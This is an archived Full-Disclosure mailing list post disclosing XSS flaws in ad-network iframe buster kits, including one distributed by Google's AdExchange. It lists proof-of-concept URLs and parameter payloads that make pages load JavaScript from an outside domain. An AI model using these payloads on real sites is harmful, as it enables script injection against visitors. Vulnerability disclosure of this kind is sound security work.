lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CAL+51AW7dGY07nqJ1pyM_u+YhL7KKyamQwOLeE4yzWHG7=a4Xw@mail.gmail.com>
Date: Tue, 19 Dec 2017 15:24:10 +0100
From: Zmx <larouanne@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Google supported XSS kit aka AdExchange iframe buster kit

Hi list,

The DFP AdExchange service of Google (the service who provide ads) is
distributing an "Iframe Buster Kit" in order to allow iframe ads to expand
outside of the iFrame.

This needs some bypass of the restriction applied to iframe, so Google
provide a kit to install on your website:
- Help Document: https://support.google.com/dfp_premium/answer/1074250
- Kit:
https://storage.googleapis.com/support-kms-prod/DB3CE51C3A5F783ED8198CDA753995FEB913

The kit contains several html and js files to be hosted on your domains.

Some of those files (still provide by Google, remember) contains very
visible XSS code:
One of them is "predicta" that simply allow you to pass the domain of from
where to load the javascript.


Quick proof of concept:
- https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life

As expandable ads allow website to gain more ads revenue, those kits is
present in a lot of website.

Other "iframe buster kit" exist that are not provided by Google, and some
of them are also vulnerable.

>From my list I have:
- /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js
- /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js
- /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look
like different version exist however)
- /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js


Some source:
- Code of predicta_bf.html provide by Google in the kit:
https://pastebin.com/BggXDHNA
- Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b
- Code of rockabox: https://pastebin.com/xqhs3zyz

Tr4L

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ